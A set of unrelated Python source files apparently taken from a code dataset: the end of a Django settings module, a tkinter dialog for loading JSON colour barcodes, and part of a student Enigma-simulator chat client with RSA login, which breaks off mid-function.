юзера, делающего запрос, чтоб форматтер их вставил потом в строку """
def filter(self, record):
# TODO: похоже, это всё больше не работает, потому что вместо request'а тут какой-то socket
request = getattr(record, 'request', None)
if request and hasattr(request, 'user'): # user
record.user = request.user
else:
record.user = '--'
if request and hasattr(request, 'META'): # IP
x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')
if x_forwarded_for:
record.ip = x_forwarded_for.split(',')[-1]
else:
record.ip = request.META.get('REMOTE_ADDR')
else:
record.ip = '--'
return True
try:
os.mkdir(os.path.join(BASE_DIR, 'logs'))
except FileExistsError:
pass
LOGGING = {
'version': 1,
'disable_existing_loggers': True,
'filters': {
'main': {
'()': F
}
},
'formatters': {
'stamp': {
'format': '%(levelname)s [%(asctime)s] %(ip)s "%(user)s" %(name)s.%(module)s %(message)s'
},
},
'handlers': {
'file_main': {
'class': 'logging.FileHandler',
'filename': os.path.join(BASE_DIR, 'logs', 'main.log'),
'formatter': 'stamp',
'filters': ['main'],
},
'console': {
'class': 'logging.StreamHandler',
'formatter': 'stamp',
'filters': ['main'],
},
'db': {
'class': 'applogs.handlers.DBLogsHandler',
'filters': ['main'],
},
},
'loggers': {
'django': {
'handlers': ['file_main', 'console'],
'level': 'WARNING',
},
'apps': {
'handlers': ['file_main', 'console'],
'level': 'DEBUG',
},
'command': {
'handlers': ['db', 'console'],
'level': 'DEBUG',
},
'api': {
'handlers': ['db', 'console'],
'level': 'DEBUG',
},
'remote_service': {
'handlers': ['db', 'console'],
'level': 'DEBUG',
},
},
}
try:
from .wfm_admin import ADMIN_COLUMNS, ADMIN_SECTIONS
except ImportError:
ADMIN_SECTIONS = {}
ADMIN_COLUMNS = []
DATA_UPLOAD_MAX_MEMORY_SIZE = 100 * 1024 * 1024 # 10 MB
DATA_UPLOAD_MAX_NUMBER_FIELDS = 10000
# AXES config
def username_getter(request, credentials):
from apps.authutils.views import axes_username_getter
return axes_username_getter(request, credentials)
AXES_CACHE = 'axes_cache'
AXES_COOLOFF_TIME = timedelta(minutes=5)
AXES_FAILURE_LIMIT = 10
AXES_LOCKOUT_TEMPLATE = 'login_locked.html'
AXES_LOCK_OUT_BY_COMBINATION_USER_AND_IP = True
AXES_USERNAME_CALLABLE = username_getter
AXES_META_PRECEDENCE_ORDER = ('HTTP_X_REAL_IP',)
|
22,490 | c8d840456fbc1abc2dfc3f06f46a21a18fd76f1f | """ LoadJsonWindow Class """
import tkinter.filedialog
from tkinter.messagebox import showerror, showinfo
import copy
import os
from kalmus.tkinter_windows.gui_utils import resource_path, update_graph
class LoadJsonWindow():
"""
loadJsonWindow Class
GUI window for user to load the barcode from existed json file to replace with the barcode in the main window
"""
def __init__(self, barcode_generator, barcode_1, barcode_2, axes,
canvas, barcode_stack):
"""
Initialize
:param barcode_generator: The barcode generator
:param barcode_1: The barcode 1
:param barcode_2: The barcode 2
:param axes: The axes of the plotted figure in the main window
:param canvas: The canvas of the plotted figure in the main window
:param barcode_stack: The dictionary that stores all the barcode on memory
"""
self.barcode_generator = barcode_generator
self.barcode_1 = barcode_1
self.barcode_2 = barcode_2
# Set up the axes and canvas
self.axes = axes
self.canvas = canvas
self.barcode_stack = barcode_stack
# Initialize the window
self.window = tkinter.Tk()
self.window.wm_title("Load JSON Barcode")
self.window.iconbitmap(resource_path("kalmus_icon.ico"))
# Label prompt for the file name/path to the json file
filename_label = tkinter.Label(self.window, text="JSON file path: ")
filename_label.grid(row=0, column=0, sticky=tkinter.W)
# Text entry for user to type the file name/path to the json file
self.filename_entry = tkinter.Entry(self.window, textvariable="", width=40)
self.filename_entry.grid(row=0, column=1, columnspan=2, sticky=tkinter.W)
# Label prompt for user to specify the type of the barcode they will load
barcode_type_label = tkinter.Label(self.window, text="Specify Barcode Type: ")
barcode_type_label.grid(row=1, column=0, sticky=tkinter.W)
# The variable that stores the type of barcode
self.type_variable = tkinter.StringVar(self.window)
self.type_variable.set("Color")
# The dropdown menu for user to select the type of the loaded barcode
dropdown_type = tkinter.OptionMenu(self.window, self.type_variable, "Color", "Brightness")
dropdown_type.grid(row=1, column=1, sticky=tkinter.W)
# Button to build/load the barcode using the given json file
self.button_build_barcode = tkinter.Button(self.window, text="Load", command=self.build_barcode)
self.button_build_barcode.grid(row=2, column=3, columnspan=1)
# Button to browse the folder
self.button_browse_folder = tkinter.Button(self.window, text="Browse", command=self.browse_folder)
self.button_browse_folder.grid(row=0, column=3)
# Variable that stores whcih barcode in the main window to replace with
self.barcode_option = tkinter.StringVar(self.window)
self.barcode_option.set("Barcode 1")
# Radio button for selecting which barcode in the main window to replace with
radio_barcode_1 = tkinter.Radiobutton(self.window, text="Barcode 1", variable=self.barcode_option,
value="Barcode 1", anchor='w')
radio_barcode_1.grid(row=1, column=2, sticky=tkinter.W)
radio_barcode_1.select()
radio_barcode_2 = tkinter.Radiobutton(self.window, text="Barcode 2", variable=self.barcode_option,
value="Barcode 2", anchor='w')
radio_barcode_2.grid(row=2, column=2, sticky=tkinter.W)
def browse_folder(self):
"""
Browse the folder to locate the json file
"""
# Get the file name from the user selection
filename = tkinter.filedialog.askopenfilename(initialdir=".", title="Select JSON file",
filetypes=(("json files", "*.json"), ("txt files", "*.txt"),
("All files", "*.*")))
# Update the file name to the file name text entry
self.filename_entry.delete(0, tkinter.END)
self.filename_entry.insert(0, filename)
def build_barcode(self):
"""
Build/load the barcode use the json file
"""
# Get the file name/path to the json file
filename = self.filename_entry.get()
# Check if the filename is given
if not os.path.exists(filename):
showerror("JSON File Not Exists", "JSON file not exists.\n"
"Please check the JSON file path.")
return
try:
# Generate the barcode from json file use the barcode generator
barcode_type = self.type_variable.get()
self.barcode_generator.generate_barcode_from_json(filename, barcode_type)
except:
showerror("Error Occurred in Loading JSON Barcode", "An error occurred in loading the JSON barcode.\n\n"
"Please make sure the type of Barcode saved\n"
"in the JSON file is correctly specified.\n"
"Color or Brightness")
return
# Get the name of the json file
start_pos = filename.rfind("/") + 1
if start_pos < 0:
start_pos = 0
# Use that as the key to the newly built/loaded barcode
barcode_name = filename[start_pos: filename.rfind(".json")]
self.barcode_stack[barcode_name] = copy.deepcopy(self.barcode_generator.get_barcode())
# Get which barcode in the main window to replace with
which_barcode = self.barcode_option.get()
if which_barcode == "Barcode 1":
self.barcode_1.__dict__ = self.barcode_generator.get_barcode().__dict__.copy()
self.barcode_1.__class__ = self.barcode_generator.get_barcode().__class__
elif which_barcode == "Barcode 2":
self.barcode_2.__dict__ = self.barcode_generator.get_barcode().__dict__.copy()
self.barcode_2.__class__ = self.barcode_generator.get_barcode().__class__
# Clear the plotted axes in the main window
self.axes[0][0].cla()
self.axes[1][0].cla()
self.axes[0][1].cla()
self.axes[1][1].cla()
# Always plotted the barcode with longer width below
if self.barcode_1.get_barcode().shape[1] > self.barcode_2.get_barcode().shape[1]:
temp = copy.deepcopy(self.barcode_1)
self.barcode_1.__dict__ = self.barcode_2.__dict__.copy()
self.barcode_2.__dict__ = temp.__dict__.copy()
# Update the graph/plotted figure in the main window
update_graph(barcode_1=self.barcode_1, barcode_2=self.barcode_2, axes=self.axes)
# Redraw the main window
self.canvas.draw()
# Quit the main window
self.window.destroy()
showinfo("Barcode Loaded Successfully", "{:s} Barcode has been successfully loaded into the memory.\n\n"
"Name key in memory: {:20s}".format(barcode_type, barcode_name))
|
22,491 | 75ca3d19e0ebcebd5c1397c50e231fc68d29f4e1 | """
Name: Jasmin Maizel
Final Project subject: Cryptography - Enigma
this is the client class file - it connects to the server and handles all the GUI.
Python Version: 3.7.4
Date: 10.02.2021
"""
import socket
import sys
from datetime import datetime
from pickle import dumps, loads
from threading import Thread
from tkinter import Tk, Label, Button, Frame, Entry, END, Scrollbar, Text, OptionMenu, \
BOTTOM, LEFT, RIGHT, DISABLED, NORMAL, Y, RIDGE, StringVar, font
import speech_recognition
from morse import Morse
from rsa_class import RSA_encryption
from canvas_enigma_encryption import ShowEncryption
from enigma import Enigma
class Client:
"""
this class represents the client: its gui and socket.
"""
def __init__(self, host_ip="127.0.0.1", dst_port=2000):
"""
creates the Tk object, the socket and starts running the entire code.
"""
self.my_socket = socket.socket()
try:
self.my_socket.connect((host_ip, dst_port))
print("Connected to server successfully")
except socket.error:
print("no server is waiting...")
sys.exit()
# creating RSA object and exchanging keys with server
self.rsa_object = RSA_encryption()
self.server_key = self.my_socket.recv(8000)
self.my_socket.send(self.rsa_object.get_public_key())
# variables connected to enigma
self.simulator_enigma = Enigma()
self.simulator_encryption = []
self.simulator_encryption_text = ""
self.log_in_tries = 0
self.sign_in_tries = 0
self.username = ""
# variable the will contain all the messages and a message receiver thread
self.receive_thread = Thread(target=self.receive, daemon=True)
self.msg_list = []
# these variables are used in more than one function, and not always exist.
# therefore we need to make them None when they are not in use.
self.messages_window = None
self.refresh_button = None
# speech thread variable that will determine whether or not the thread can be started
self.thread_speech_is_running = False
# the GUI object and its properties
self.root = Tk()
self.root.protocol("WM_DELETE_WINDOW", self.close_root)
self.root.resizable(False, False)
self.root.title("my enigma project")
self.bg_color = "khaki1"
self.root.configure(background=self.bg_color)
# fonts for the GUI
self.title_font = font.Font(family="Helvetica", size=20, weight=font.BOLD,
slant=font.ITALIC)
self.text_font = font.Font(family="Helvetica", size=14, weight=font.BOLD)
# starting the object
self.log_in()
self.root.mainloop()
def close_root(self):
"""
this is the closing protocol. this function closes all Tk
objects that might exist in order to close the program entirely.
:return:
"""
if self.messages_window is not None:
self.messages_window.destroy()
self.root.destroy()
def after_3_wrong_attempts(self, str_from_where):
"""
after 3 wrong attempts, this function will block the user
from signing/logging in for 60 seconds.
:param str_from_where:
:return:
"""
self.clear_screen()
def timer_tick(seconds):
"""
this is an inner-function that is responsible for the
timer after3 failed attempts at logging/signing in.
:param seconds:
:return:
"""
if seconds > 0:
timer_label['text'] = "You had 3 wrong attempts.\nTry again in " + \
str(seconds) + " seconds."
self.root.after(1000, lambda: timer_tick(seconds - 1))
else:
if str_from_where == "log in":
self.log_in()
else:
self.sign_in()
timer_label = Label(self.root, font=self.title_font, bg=self.bg_color)
timer_label.pack(padx=50, pady=150)
timer_tick(60)
def log_in(self):
"""
this function shows the log in window
:return:
"""
self.clear_screen()
lbl_log_in = Label(self.root, text="Welcome. Please log in to the system.",
font=self.title_font,
bg=self.bg_color)
lbl_log_in.pack(pady=5, padx=10)
user_name = Label(self.root, text="enter user name", font=self.text_font, bg=self.bg_color)
user_name.pack(pady=5, padx=10)
user_name_entry = Entry(self.root, font='Helvetica 14', fg='blue', width=25)
user_name_entry.pack(pady=5, padx=10)
password = Label(self.root, text="enter password", font=self.text_font, bg=self.bg_color)
password.pack(pady=5, padx=10)
password_entry = Entry(self.root, font='Helvetica 14', fg='blue', width=25, show="*")
password_entry.pack(pady=5, padx=10)
passcode = Label(self.root, text="enter passcode", font=self.text_font, bg=self.bg_color)
passcode.pack(pady=5, padx=10)
passcode_entry = Entry(self.root, font='Helvetica 14', fg='blue', width=25, show="*")
passcode_entry.pack(pady=5, padx=10)
button_enter_log = Button(self.root, text="log in", command=lambda: self.submit_log_in(
user_name_entry, password_entry, passcode_entry))
button_enter_log.pack(pady=10)
button_sign_in = Button(self.root, text="Don't have a user? Sign in", command=self.sign_in)
button_sign_in.pack(pady=10)
def submit_log_in(self, user_name, password, passcode):
"""
this function sends to the server the data and returns
whether the client logged in successfully or not.
:param user_name:
:param password:
:param passcode:
:return:
"""
username_txt = user_name.get()
password_txt = password.get()
passcode_txt = passcode.get()
self.my_socket.send(dumps("log in"))
now = datetime.now()
current_time = now.strftime("%H:%M:%S").split(":")
time = current_time[0] + current_time[1]
str_log_in = username_txt + ";" + password_txt + ";" + passcode_txt + ";" + time
self.my_socket.send(self.rsa_object.encrypt(str_log_in.encode(), self.server_key))
response = self.rsa_object.decrypt(self.my_socket.recv(1024)).decode()
if response == "access granted":
self.username = username_txt
self.choose_path()
else:
if self.log_in_tries == 2:
self.log_in_tries = 0
self.after_3_wrong_attempts("log in")
else:
self.log_in_tries += 1
lbl_response = Label(self.root, text=response, font=self.title_font,
bg=self.bg_color)
lbl_response.pack(pady=5, padx=10)
lbl_response.after(1000, lbl_response.destroy)
user_name.delete(0, END)
password.delete(0, END)
passcode.delete(0, END)
def sign_in(self):
"""
this function shows the sign in window
:return:
"""
self.clear_screen()
lbl_sign_in = Label(self.root, text="Welcome. Please sign in to the system.",
font=self.title_font, bg=self.bg_color)
lbl_sign_in.pack(pady=5, padx=10)
user_name = Label(self.root, text="enter user name", font=self.text_font, bg=self.bg_color)
user_name.pack(pady=5, padx=10)
user_name_entry = Entry(self.root, font='Helvetica 14', fg='blue', width=25)
user_name_entry.pack(pady=5, padx=10)
id_label = Label(self.root, text="enter id", font=self.text_font, bg=self.bg_color)
id_label.pack(pady=5, padx=10)
id_entry = Entry(self.root, font='Helvetica 14', fg='blue', width=25)
id_entry.pack(pady=5, padx=10)
password1 = Label(self.root, text="create password", font=self.text_font, bg=self.bg_color)
password1.pack(pady=5, padx=10)
password_explanation = Label(self.root, text="please note that the password must "
"contain at\nleast 8 characters, and at least "
"one of each:\ncapital and a small "
"letter, a symbol and a digit", font="none 11",
bg=self.bg_color, fg="navy")
password_explanation.pack(pady=5, padx=10)
password1_entry = Entry(self.root, font='Helvetica 14', fg='blue', width=25, show="*")
password1_entry.pack(pady=5, padx=10)
password2 = Label(self.root, text="repeat password", font=self.text_font, bg=self.bg_color)
password2.pack(pady=5, padx=10)
password2_entry = Entry(self.root, font='Helvetica 14', fg='blue', width=25, show="*")
password2_entry.pack(pady=5, padx=10)
passcode = Label(self.root, text="enter passcode", font=self.text_font, bg=self.bg_color)
passcode.pack(pady=5, padx=10)
passcode_entry = Entry(self.root, font='Helvetica 14', fg='blue', width=25, show="*")
passcode_entry.pack(pady=5, padx=10)
button_enter = Button(self.root, text="sign in",
command=lambda: self.submit_sign_in(user_name_entry,
id_entry, password1_entry,
password2_entry,
passcode_entry))
button_enter.pack(pady=5, padx=10)
button_enter = Button(self.root, text="go to log in", command=self.log_in)
button_enter.pack(pady=5, padx=10)
def submit_sign_in(self, user_name, id_widget, password1, password2, passcode):
"""
this function sends to the server the data and returns
whether the user was created successfully or not.
:param user_name:
:param id_widget:
:param password1:
:param password2:
:param passcode:
:return:
"""
username_txt = user_name.get()
id_txt = id_widget.get()
password1_txt = password1.get()
password2_txt = password2.get()
passcode_txt = passcode.get()
self.my_socket.send(dumps("sign in"))
now = datetime.now()
current_time = now.strftime("%H:%M:%S").split(":")
time = current_time[0] + current_time[1]
sign_in_str = username_txt + ";" + id_txt + ";" + password1_txt + ";" + \
password2_txt + ";" + passcode_txt + ";" + time
self.my_socket.send(self.rsa_object.encrypt(sign_in_str.encode(), self.server_key))
response = self.rsa_object.decrypt(self.my_socket.recv(1024)).decode()
if self.sign_in_tries == 2:
self.sign_in_tries = 0
self.after_3_wrong_attempts("sign in")
else:
if response != "user successfully signed in. to complete the process, log in.":
self.sign_in_tries += 1
lbl_response = Label(self.root, text=response, font=self.title_font,
bg=self.bg_color)
lbl_response.pack(pady=5, padx=10)
lbl_response.after(1000, lbl_response.destroy)
user_name.delete(0, END)
id_widget.delete(0, END)
password1.delete(0, END)
password2.delete(0, END)
passcode.delete(0, END)
def choose_path(self):
"""
this function shows the paths window. the client may choose what to do.
:return:
"""
if not self.receive_thread.is_alive():
self.receive_thread.start()
self.clear_screen()
self.refresh_button = None
user_label = Label(self.root, text="Hello " + self.username, font=self.title_font,
bg=self.bg_color, height=2)
user_label.pack(pady=10, padx=50)
button_read_msg = Button(self.root, text="read messages", font=self.text_font,
height=2, width=20, command=lambda: self.read_messages(1))
button_read_msg.pack(pady=20, padx=50)
button_send_msg = Button(self.root, text="send message", font=self.text_font,
height=2, width=20, command=self.send_messages)
button_send_msg.pack(pady=20, padx=50)
button_simulator = Button(self.root, text="simulator", font=self.text_font,
height=2, width=20, command=self.simulator)
button_simulator.pack(pady=20, padx=50)
button_read = Button(self.root, text="About", font=self.text_font,
height=2, width=20, command=self.about_screen)
button_read.pack(pady=20, padx=50)
def read_messages(self, msg_num):
"""
this function shows the read window.
it allows the client to read all the messages. both received and sent.
:param msg_num:
:return:
"""
self.clear_screen()
user_label = Label(self.root, text="Hello " + self.username, font=self.title_font,
bg=self.bg_color, height=2)
user_label.pack(pady=5, padx=50)
lbl_msg = Label(self.root, text="Message " + str(msg_num), font=self.title_font,
bg=self.bg_color)
lbl_msg.pack(pady=5, padx=10)
self.refresh_button = Button(self.root, text="Refresh page", font=self.text_font,
bg=self.bg_color, command=lambda: self.refresh(msg_num))
self.refresh_button.pack(padx=10, pady=10)
messages_frame = Frame(self.root)
messages_frame.pack(padx=30, pady=15)
scrollbar_msg = Scrollbar(messages_frame)
scrollbar_msg.pack(side=RIGHT, fill=Y)
text_widget = Text(messages_frame, width=50, height=15, font=self.text_font,
yscrollcommand=scrollbar_msg.set)
text_widget.pack()
scrollbar_msg.config(command=text_widget.yview)
button_send = Button(self.root, text="go back", font=self.text_font,
height=2, width=20, command=self.go_back_read)
button_send.pack(pady=5, side=BOTTOM)
button_send = Button(self.root, text="see/close message\ncontrol panel",
font=self.text_font,
height=2, width=20,
command=lambda: self.new_window_messages(button_send))
button_send.pack(pady=5, side=BOTTOM)
if self.msg_list:
if msg_num < len(self.msg_list):
next_msg = Button(self.root, text="next message", font=self.text_font,
height=2, width=20,
command=lambda: self.read_messages(msg_num + 1))
next_msg.pack(pady=5, padx=5, side=RIGHT)
if msg_num > 1:
previous_msg = Button(self.root, text="previous message", font=self.text_font,
height=2, width=20,
command=lambda: self.read_messages(msg_num - 1))
previous_msg.pack(pady=5, padx=5, side=LEFT)
text_widget.insert(END, "from: " + self.msg_list[msg_num - 1][2] + "\n")
text_widget.tag_add('sender', '1.0', '1.end')
text_widget.tag_config('sender', font='none 14')
text_widget.insert(END, self.msg_list[msg_num - 1][0])
text_widget.tag_add('msg', '2.0', END)
text_widget.tag_config('msg', font='none 12')
text_widget.config(state=DISABLED)
def refresh(self, msg_num):
"""
this function refreshes the read messages page.
:param msg_num:
:return:
"""
if self.messages_window is not None:
self.messages_window.destroy()
self.messages_window = None
self.read_messages(msg_num)
def go_back_read(self):
"""
this function makes sure that when going back
from the read window, all windows work properly.
:return:
"""
if self.messages_window is not None:
self.messages_window.destroy()
self.messages_window = None
self.choose_path()
def new_window_messages(self, button_see_all_msgs):
"""
opens a new window that contains all the messages.
:param button_see_all_msgs:
:return:
"""
# changing the button command to closing the window
button_see_all_msgs.config(command=lambda: self.close_window(button_see_all_msgs))
# creating the chat Tk object
self.messages_window = Tk()
self.messages_window.resizable(False, False)
self.messages_window.config(bg=self.bg_color)
self.messages_window.protocol("WM_DELETE_WINDOW",
lambda: self.close_window(button_see_all_msgs))
chat_label = Label(self.messages_window, text="Hello " + self.username +
"\nHere are your messages",
bg=self.bg_color, font=self.title_font)
chat_label.pack(padx=20, pady=10)
chat_frame = Frame(self.messages_window)
chat_frame.pack(padx=15, pady=15)
scrollbar_chat = Scrollbar(chat_frame)
scrollbar_chat.pack(side=RIGHT, fill=Y)
text_chat = Text(chat_frame, width=30, height=15, font=self.text_font,
yscrollcommand=scrollbar_chat.set)
text_chat.pack()
scrollbar_chat.config(command=text_chat.yview)
for msg, encryption_data, sender_user in self.msg_list:
text_chat.insert(END, "from: " + sender_user + "\n")
text_chat.insert(END, msg + "\n\n")
text_chat.config(state=DISABLED)
def close_window(self, button_msgs):
"""
closing the second Tk object
:param button_msgs:
:return:
"""
if self.messages_window is not None:
self.messages_window.destroy()
self.messages_window = None
button_msgs.config(command=lambda: self.new_window_messages(button_msgs))
def send_messages(self):
"""
this function is the send window.
it allows the client to send a message.
:return:
"""
self.clear_screen()
user_label = Label(self.root, text="Hello " + self.username,
font=self.title_font, bg=self.bg_color, height=2)
user_label.pack(pady=10, padx=50)
messages_frame = Frame(self.root)
messages_frame.pack(padx=30, pady=10)
scrollbar_msg = Scrollbar(messages_frame)
scrollbar_msg.pack(side=RIGHT, fill=Y)
write_message = Text(messages_frame, width=50, height=15, font=self.text_font,
yscrollcommand=scrollbar_msg.set)
write_message.pack()
scrollbar_msg.config(command=write_message.yview)
button_speech_rec = Button(self.root, text="listen\nto speech", font=self.text_font,
height=2, width=20,
command=lambda: self.create_speech_thread(write_message))
button_speech_rec.pack(pady=10)
button_send = Button(self.root, text="send", font=self.text_font,
height=2, width=20, command=lambda: self.send(write_message))
button_send.pack(pady=10)
button_send = Button(self.root, text="go back", font=self.text_font,
height=2, width=20, command=self.choose_path)
button_send.pack(pady=10)
def create_speech_thread(self, text_widget):
"""
this function creates a thread that will listen to users input in microphone
:param text_widget:
:return:
"""
if not self.thread_speech_is_running:
thread_speech = Thread(target=self.speech_recognizer_function,
args=(text_widget,), daemon=True)
thread_speech.start()
self.thread_speech_is_running = True
def speech_recognizer_function(self, text_widget):
"""
this function recognizes the input of the microphone and turns it into text.
the text is inserted to the text widget and then the user
will be able to send it as a message
:param text_widget:
:return:
"""
label_listening = Label(self.root, text="listening to input...",
font=self.text_font, bg=self.bg_color)
label_listening.pack(pady=10)
recognizer = speech_recognition.Recognizer()
microphone = speech_recognition.Microphone()
with microphone as source:
recognizer.adjust_for_ambient_noise(source)
audio = recognizer.listen(source)
try:
text = recognizer.recognize_google(audio)
text += " "
except:
text = ""
text_widget.insert(END, text)
label_listening.destroy()
self.thread_speech_is_running = False
def color_letter(self, letter, lst_labels, plain_text_widget, encrypted_text_widget):
"""
this function colors the encrypted letter label in the simulator for 300 milliseconds
:param letter:
:param lst_labels:
:param plain_text_widget:
:param encrypted_text_widget:
:return:
"""
new_letter, txt_encryption = self.simulator_enigma.encrypt_letter(letter)
lst_encryption_letter_stages = [i[-1] for i in txt_encryption.split("\n")]
lst_encryption_letter_stages.remove(')')
self.simulator_encryption.append((txt_encryption, lst_encryption_letter_stages))
lst_labels[ord(new_letter) - 65].config(bg="yellow")
lst_labels[ord(new_letter) - 65].after(300, lambda: lst_labels[ord(new_letter) -
65].config(bg="khaki"))
plain_text_widget.config(state=NORMAL)
plain_text_widget.insert(END, letter)
plain_text_widget.config(state=DISABLED)
encrypted_text_widget.config(state=NORMAL)
encrypted_text_widget.insert(END, new_letter)
encrypted_text_widget.config(state=DISABLED)
def simulator(self, rotors_settings=(1, 2, 3, 'A', 'A', 'A'),
plugboard_settings=None, plain_text=""):
"""
displays the enigma simulator
:return:
"""
self.clear_screen()
user_label = Label(self.root, text="Hello " + self.username,
font=self.title_font, bg=self.bg_color, height=2)
user_label.grid(pady=10, padx=50, row=0, column=11, columnspan=5)
if plain_text == "":
self.simulator_encryption = []
if plugboard_settings is None:
self.simulator_enigma.plugboard.reset_plugboard()
self.simulator_enigma.rotors.set_rotors(rotors_settings[0], rotors_settings[1],
rotors_settings[2], rotors_settings[3],
rotors_settings[4], rotors_settings[5])
simulator_title = Label(self.root, text="Enigma Simulator",
font=self.title_font, bg=self.bg_color)
simulator_title.grid(row=0, column=2, columnspan=8, rowspan=2, pady=15, padx=5)
lst_labels = []
plain_text_frame = Frame(self.root, width=300, height=200)
plain_text_frame.grid(row=2, column=11, columnspan=5, rowspan=3, padx=10)
plain_text_label = Label(plain_text_frame, text="Plain Text",
width=12, font=self.title_font)
plain_text_label.pack(padx=5, pady=3)
text_widget_frame1 = Frame(plain_text_frame)
text_widget_frame1.pack()
scrollbar1 = Scrollbar(text_widget_frame1)
scrollbar1.pack(side=RIGHT, fill=Y)
plain_text_text = Text(text_widget_frame1, width=30, height=8, font=self.text_font,
yscrollcommand=scrollbar1.set)
plain_text_text.pack(padx=5, pady=3)
scrollbar1.config(command=plain_text_text.yview)
plain_text_text.insert(END, plain_text)
plain_text_text.config(state=DISABLED)
encrypted_text_frame = Frame(self.root, width=300, height=200)
encrypted_text_frame.grid(row=6, column=11, columnspan=5, rowspan=3, padx=10)
encrypted_text_label = Label(encrypted_text_frame, text="Encrypted Text",
width=12, font=self.title_font)
encrypted_text_label.pack(padx=5, pady=3)
text_widget_frame2 = Frame(encrypted_text_frame)
text_widget_frame2.pack()
scrollbar2 = Scrollbar(text_widget_frame2)
scrollbar2.pack(side=RIGHT, fill=Y)
encrypted_text_text = Text(text_widget_frame2, width=30, height=8, font=self.text_font,
yscrollcommand=scrollbar2.set)
encrypted_text_text.pack(padx=5, pady=3)
scrollbar2.config(command=encrypted_text_text.yview)
encrypted_text_text.insert(END, self.simulator_enigma.decrypt_encrypt_text(plain_text))
encrypted_text_text.config(state=DISABLED)
for i in range(65, 75):
letter_label = Label(self.root, text=" " + chr(i) + " ", font=self.text_font,
bg="khaki", relief=RIDGE, height=2, width=3)
letter_label.grid(row=2, column=i - 64, pady=5, padx=5)
lst_labels.append(letter_label)
for i in range(75, 85):
letter_label = Label(self.root, text=" " + chr(i) + " ", font=self.text_font,
bg="khaki", relief=RIDGE, height=2, width=3)
letter_label.grid(row=3, column=i - 74, pady=5, padx=5)
lst_labels.append(letter_label)
for i in range(85, 91):
letter_label = Label(self.root, text=" " + chr(i) + " ", font=self.text_font,
bg="khaki", relief=RIDGE, height=2, width=3)
letter_label.grid(row=4, column=i - 82, pady=5, padx=5)
lst_labels.append(letter_label)
label_line = Label(self.root, text=" ", font=self.text_font, bg=self.bg_color)
label_line.grid(row=5, column=0)
for i in range(65, 75):
letter_button = Button(self.root, text=" " + chr(i) + " ", font=self.text_font,
height=2, width=3, bg="sienna2",
command=lambda letter_ord=i:
self.color_letter(chr(letter_ord),
lst_labels,
plain_text_text,
encrypted_text_text))
letter_button.grid(row=6, column=i - 64, pady=5, padx=5)
for i in range(75, 85):
letter_button = Button(self.root, text=" " + chr(i) + " ", font=self.text_font,
height=2, width=3, bg="sienna2",
command=lambda letter_ord=i:
self.color_letter(chr(letter_ord),
lst_labels,
plain_text_text,
encrypted_text_text))
letter_button.grid(row=7, column=i - 74, pady=5, padx=5)
for i in range(85, 91):
letter_button = Button(self.root, text=" " + chr(i) + " ", font=self.text_font,
height=2, width=3, bg="sienna2",
command=lambda letter_ord=i:
self.color_letter(chr(letter_ord),
lst_labels,
plain_text_text,
encrypted_text_text))
letter_button.grid(row=8, column=i - 82, pady=5, padx=5)
button_go_back = Button(self.root, text="go back to\nchoose path", font=self.text_font,
height=2, width=15, command=self.choose_path)
button_go_back.grid(row=10, column=1, columnspan=4, rowspan=2, pady=20, padx=5)
button_change_settings = Button(self.root, text="change settings", font=self.text_font,
height=2, width=15, command=self.change_settings)
button_change_settings.grid(row=10, column=5, columnspan=4, rowspan=2, pady=20, padx=5)
button_explain = Button(self.root, text="See Encryption", font=self.text_font,
height=2, width=15,
command=lambda: self.show_simulator_encryption(rotors_settings,
plugboard_settings,
plain_text_text.get(
"1.0", END).
replace("\n", "")))
button_explain.grid(row=10, column=9, columnspan=4, rowspan=2, pady=20, padx=5)
plugboard_settings_to_send = [self.simulator_enigma.plugboard.plugboard1,
self.simulator_enigma.plugboard.plugboard2]
button_change_settings = Button(self.root, text="send encrypted\nmessage",
height=2, width=15, font=self.text_font,
command=lambda: self.send(plain_text_text, rotors_settings,
plugboard_settings_to_send))
button_change_settings.grid(row=10, column=13, columnspan=4, rowspan=2, pady=20, padx=5)
def change_settings(self):
"""
this function lets the user change the settings of the simulator
:return:
"""
self.clear_screen()
# making sure the screen grid will be organized
label_line = Label(self.root, text=" ", font=self.text_font, bg=self.bg_color)
label_line.grid(row=0, column=0)
label_line = Label(self.root, text=" ", font=self.text_font, bg=self.bg_color)
label_line.grid(row=0, column=10)
user_label = Label(self.root, text="Hello " + self.username,
font=self.title_font, bg=self.bg_color, height=2)
user_label.grid(pady=10, padx=50, row=0, column=6, columnspan=4)
settings_title = Label(self.root, text="Enigma Settings",
font=self.title_font, bg=self.bg_color)
settings_title.grid(row=0, column=2, columnspan=4, pady=15)
rotor1_num, rotor2_num, rotor3_num, rotor1_letter, rotor2_letter, rotor3_letter = \
self.simulator_enigma.rotors.get_initial_setting()
lst_roman_rotor_num = ["I", "II", "III", "IV", "V"]
rotors_number = Label(self.root, text="the rotors in the enigma",
font=self.title_font, bg=self.bg_color)
rotors_number.grid(row=1, column=3, columnspan=5, pady=5)
numbers_lst = ["I", "II", "III", "IV", "V"]
first_rotor_label_num = Label(self.root, text="First Rotor",
font=self.text_font, bg=self.bg_color)
first_rotor_label_num.grid(row=2, column=1, columnspan=3)
options_rotor1 = StringVar()
options_rotor1.set(lst_roman_rotor_num[int(rotor1_num) - 1])
rotor_num1_options = OptionMenu(self.root, options_rotor1, *numbers_lst)
rotor_num1_options.grid(row=3, column=1, columnspan=3, padx=15)
second_rotor_label_num = Label(self.root, text="Second Rotor",
font=self.text_font, bg=self.bg_color)
second_rotor_label_num.grid(row=2, column=4, columnspan=3)
options_rotor2 = StringVar()
options_rotor2.set(lst_roman_rotor_num[int(rotor2_num) - 1])
rotor_num2_options = OptionMenu(self.root, options_rotor2, *numbers_lst)
rotor_num2_options.grid(row=3, column=4, columnspan=3, padx=15)
third_rotor_label_num = Label(self.root, text="Third Rotor",
font=self.text_font, bg=self.bg_color)
third_rotor_label_num.grid(row=2, column=7, columnspan=3)
options_rotor3 = StringVar()
options_rotor3.set(lst_roman_rotor_num[int(rotor3_num) - 1])
rotor_num3_options = OptionMenu(self.root, options_rotor3, *numbers_lst)
rotor_num3_options.grid(row=3, column=7, columnspan=3, padx=15)
rotors_letters = Label(self.root, text="the letters on the rotors",
font=self.title_font, bg=self.bg_color)
rotors_letters.grid(row=4, column=3, columnspan=5, pady=5)
abc_lst = [chr(i) for i in range(65, 91)]
first_rotor_label_letter = Label(self.root, text="first Rotor",
font=self.text_font, bg=self.bg_color)
first_rotor_label_letter.grid(row=5, column=1, columnspan=3)
options_rotor_l1 = StringVar()
options_rotor_l1.set(rotor1_letter)
